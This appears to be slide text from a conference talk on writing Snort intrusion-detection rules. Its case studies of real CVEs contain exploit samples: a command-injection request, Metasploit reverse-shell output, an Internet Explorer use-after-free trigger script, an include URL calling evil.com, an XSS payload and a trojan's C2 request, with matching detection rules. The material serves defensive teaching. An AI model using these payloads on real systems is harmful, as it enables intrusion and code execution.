2. Snort Rule Syntax
# rule header
alert tcp any any -> 192.168.1.0/24 111 (
rule action
protocol
src address
src port
dst address
dst port
3. Snort Rule Syntax
# rule option format
alert tcp any any -> 192.168.1.0/24 111 (
msg:"Rule Message";
rule option
rule option argument
4. rule option: content
# content match example
alert tcp any any -> 192.168.1.0/24 111 (
content:"ABCD";
# is equivalent to:
content:"|41 42 43 44|";
The content match finds a static pattern in
network data.
5. content modifiers: nocase
# content match modifiers: nocase
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" or "abcd" etc.
content:"ABCD"; nocase;
nocase makes a content match case insensitive.
content matches are case sensitive by default.
6. content modifiers: offset
# content match modifiers: offset
alert tcp any any -> 192.168.1.0/24 111 (
# skip 2 bytes before searching for "ABCD"
content:"ABCD"; offset:2;
offset requires the match to occur after the
designated offset in network data.
7. content modifiers: depth
# content match modifiers: depth
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" within the first 4 bytes of the payload
content:"ABCD"; depth:4;
depth restricts how far Snort should search for
the specified pattern.
8. content modifiers: distance
# content match modifiers: distance
alert tcp any any -> 192.168.1.0/24 111 (
# find "DEF" 1 byte after "ABC"
content:"ABC"; content:"DEF"; distance:1;
distance specifies how far into a payload Snort
should ignore before starting to search for the
specified pattern relative to the end of the
previous pattern match.
9. content modifiers: within
# content match modifiers: within
alert tcp any any -> 192.168.1.0/24 111 (
# find "EFG" within 10 bytes of "ABC"
content:"ABC"; content:"EFG"; within:10;
within makes sure that at most N bytes are
between pattern matches.
10. negated content match
# negated content match
alert tcp any any -> 192.168.1.0/24 111 (
# make sure "EFG" is NOT within 10 bytes of "ABC"
content:"ABC"; content:!"EFG"; within:10;
content matches can be negated.
11. content buffers
# content buffer example
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABC" within the HTTP URI
content:"ABC"; http_uri;
content matches can be restricted to a payload
location, such as the HTTP URI.
13. content modifiers: fast_pattern
# fast_pattern example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern;
fast_pattern explicitly specifies the content
match within a rule to be used with the fast
pattern matcher. The fast_pattern serves as the
âentranceâ condition for rule evaluation.
14. content modifiers: fast_pattern
# fast_pattern:only; example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern:only;
fast_pattern:only; selects the content match to
be used in the fast pattern matcher for the
rule and also specifies that this match will
not be evaluated again when the rule âentersâ.
15. rule option: pcre
# pcre rule option example
alert tcp any any -> 192.168.1.0/24 111 (
# match the following regex
pcre:"/A[BC]D/i";
pcre declares a Perl compatible regular
expression for matching on payload data.
Flags can be specified after the slash.
e.g. /i for case insensitivity.
16. Traffic Triage and Isolation
Normal Trafficfast_pattern
content, etc. Vulnerable Application Traffic
Slow
Fast
pcre
content, etc. Vulnerable Parameter Traffic
Vulnerability Condition
Vulnerability Condition
Traffic VolumeSpeed Traffic Type
19. Buffer Overflow Overview
Stack buffer overflow in AVM Fritz!Box daemon
dsl_control.
AVM Fritz!Box firmware fails to check the length of user
supplied data in a 'se' or ScriptExecute command sent in a
SOAP request to the dsl_control daemon.
20. Buffer Overflow Overview
dsl_cpi_cli_access.c registers the command 'se' to the
DSL_CPE_CLI_ScriptExecute handler function:
[...]
DSL_CPE_CLI_CMD_ADD_COMM (
"se",
"ScriptExecute",
DSL_CPE_CLI_ScriptExecute,
g_sSe);
[...]
22. Buffer Overflow Overview
The code calls the function DSL_CPE_sscanf in order to
copy the value of the parameter pCommands to the local
character array sFileName without restricton or bounds
checking. The size of the vulnerable stack buffer is 256
bytes as indicated in dsl_cpi_cli_console.h:
#define DSL_MAX_COMMAND_LINE_LENGTH 256
Triggering the vulnerability is then a simple matter of
sending >256 bytes in the first 'se' parameter.
28. Command Injection Overview
CVE-2014-3805
Command injection vulnerabilities in AlienVault OSSIM av-
centerd, which accepts SOAP commands on port 40007.
SOAP command 'get_log_line' parameter '$number_lines'
and 'get_license' parameter '$license_type' are used in OS
commands without sanitization.
29. Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_log_line() {
my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $r_file, $number_lines ) = @_;
[...]
# $number_lines used in OS command without sanitization
my $command = "tail -$number_lines $r_file";
my @content = `$command`;
[...]
}
30. Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_license() {
my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $license, $license_type ) = @_;
[...]
# $license_type used in OS command without sanitization
my $package = system ("curl --proxy-anyauth -K /etc/curlrc
http://[...]/avl/$license_type/[...]");
}
36. Command Injection Overview
CVE-2014-5073
OS command injection vulnerability in VMTurbo
Operations Manager vmtadmin.cgi parameter 'fileDate'.
If the 'callType' parameter is set to "DOWN" vmtadmin.cgi
will pass the value of 'fileDate' to system().
37. Command Injection Overview
my $actiontype = $query->param("actionType");
my $calltype = $query->param("callType");
my $filedate = $query->param("fileDate");
my $statusfile = (defined $filedate) ? $filedate :
$mon.".".$mday." [...]
[...]
elseif ($calltype eq "DOWN") {
[...]
system("rm "$upload_dir$statusfile"");
[...]
38. Command Injection Exploit
GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP
&fileDate=%22%60printf%20%27177105114[...] HTTP/1.1
Host: 172.16.41.140
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
39. Command Injection Exploit
GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP
&fileDate=%22%60printf%20%27177105114[...] HTTP/1.1
Host: 172.16.41.140
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
40. Command Injection Exploit
msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit
[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 ->
172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
id
uid=0(root) gid=0(root) groups=0(root)
45. Directory Traversal Overview
CVE-2014-2424
Directory traversal vulnerability in Oracle Event
processing. FileUploadServlet function
processUploadedFile() fails to properly sanitize the
filename parameter value.
The WMI service can be abused to convert the file upload
into remote code execution without user interaction.
55. Use-After-Free Overview
CVE-2013-3893
This vulnerability is triggered by Javascript that sets an onlosecapture()
handler on the parent of two elements. This handler clears the DOM with
document.write() when it is called. The Javascript then calls setCapture() on
the parent and the child element. This triggers the onlosecapture() handler,
freeing a reference with document.write(). After the free, the invalid
reference will remain causing a crash (or code execution) in
MSHTML!CTreeNode::GetInterface.
56. Use-After-Free Trigger
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
document.write("");
}
id_0.setCapture();
id_1.setCapture();
}
57. Use-After-Free Trigger
0:005> r
eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34
eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSHTML!CTreeNode::GetInterface+0xd8:
679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
58. Use-After-Free Detection
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any (
msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt";
flow:to_client,established;
file_data;
content:".applyElement"; nocase;
content:".onlosecapture"; nocase; within:500; fast_pattern;
content:".setCapture"; nocase; within:500;
content:".setCapture"; nocase; within:500;
pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si";
metadata:service ftp-data, service http, service imap, service pop3;
reference:cve,2013-3893;
)
59. Use-After-Free Detection
alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (
msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt";
flow:to_server,established;
file_data;
content:".applyElement"; nocase;
content:".onlosecapture"; nocase; within:500; fast_pattern;
content:".setCapture"; nocase; within:500;
content:".setCapture"; nocase; within:500;
pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si";
metadata:service smtp;
reference:cve,2013-3893;
)
62. Remote File Include Overview
CVE-2008-5053
Remote file include vulnerability in Joomla Simple RSS Reader allows execution of
arbitrary PHP code via the parameter mosConfig_live_site in
administrator/components/com_rssreader/admin.rssreader.php:
include("$mosConfig_live_site/components/com_rssreader/about.html");
$mosConfig_live_site is obtained from the GET parameter of the same name sent to
admin.rssreader.php.
Exploit:
http://site/joomlapath/administrator/components/com_rssreader
/admin.rssreader.php?mosConfig_live_site=http://evil.com/
66. Browser Plugin Overview
CVE-2012-2516
GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help
functionality for the Proficy enterprise data collection system. It can be
instantiated in a web page using the <object> tag, for example:
<object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681">
Or using Javascript:
obj = new ActiveXObject("KeyHelp.KeyScript")
67. Browser Plugin Overview
The API of this ActiveX object exposes several methods including
LaunchTriPane(), which has the following prototype:
Void LaunchTriPane(System.string ChmFile)
The function LaunchTriPane will use ShellExecute to launch hh.exe, with user
controlled data as parameters:
> HH.EXE -decompile D:/destination-folder C:/test.chm
This can be abused to write arbitrary files. Code execution is possible by
uploading a WMI .mof file.
68. Browser Plugin Disassembly
KeyHelp.ocx:
5D335165 CALL KeyHelp.5D31797F
5D33516A JMP SHORT KeyHelp.5D33517D
5D33516C PUSH 5
5D33516E PUSH EDI
5D33516F PUSH ESI ; Malicious command line parameters - no validation
5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe"
5D335175 PUSH EDI
5D335176 PUSH EDI
5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params
5D33517D CMP ESI,EDI
5D33517F JE SHORT KeyHelp.5D335187
5D335181 PUSH ESI
74. Cross Site Scripting (XSS) Overview
OSVDB-89893
Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient
sanitization of âwidthâ and âheightâ parameters sent to the URI:
/includes/components/alertcloud/index.php
Exploit:
/nagiosxi/includes/components/alertcloud/index.php?height=4"}};
alert('XSS'); var aa={"A":{"B":"
75. Cross Site Scripting (XSS) Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt";
flow:to_server,established;
content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri;
pcre:"/[?&](height|width)=[^&]*?([x22x27x3cx3ex28x29]|script|onload|src)/Ui";
metadata:service http;
reference:url,osvdb.org/show/osvdb/89893;
classtype:web-application-attack;
)
78. Malware Sample Overview
Win.Trojan.Sefnit
Upon execution Win.Trojan.Sefnit drops a service to %AppData%Updaterupdater.dll and starts it.
When the service updater.dll starts it attempts to read tasks from the configuration file
%AppData%Updater/~conf.dat
Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and
appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the
encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in
the initial request to C2:
GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1
Host: axnlze.net
Accept: */*
The URI above has the following hardcoded format:
hxxp://<c2domain>/j/<uuid>/<version>
82. Call to Action
âą Related sessions:
âą Introduction to Snort Rule Writing
âą Detection Strategies with Snort [DevNet-1126]
âą Visit the World of Solutions for
âą Cisco Campus
âą Walk in Labs
âą Technical Solution Clinics
âą Meet the Engineer - Available immediately after this talk.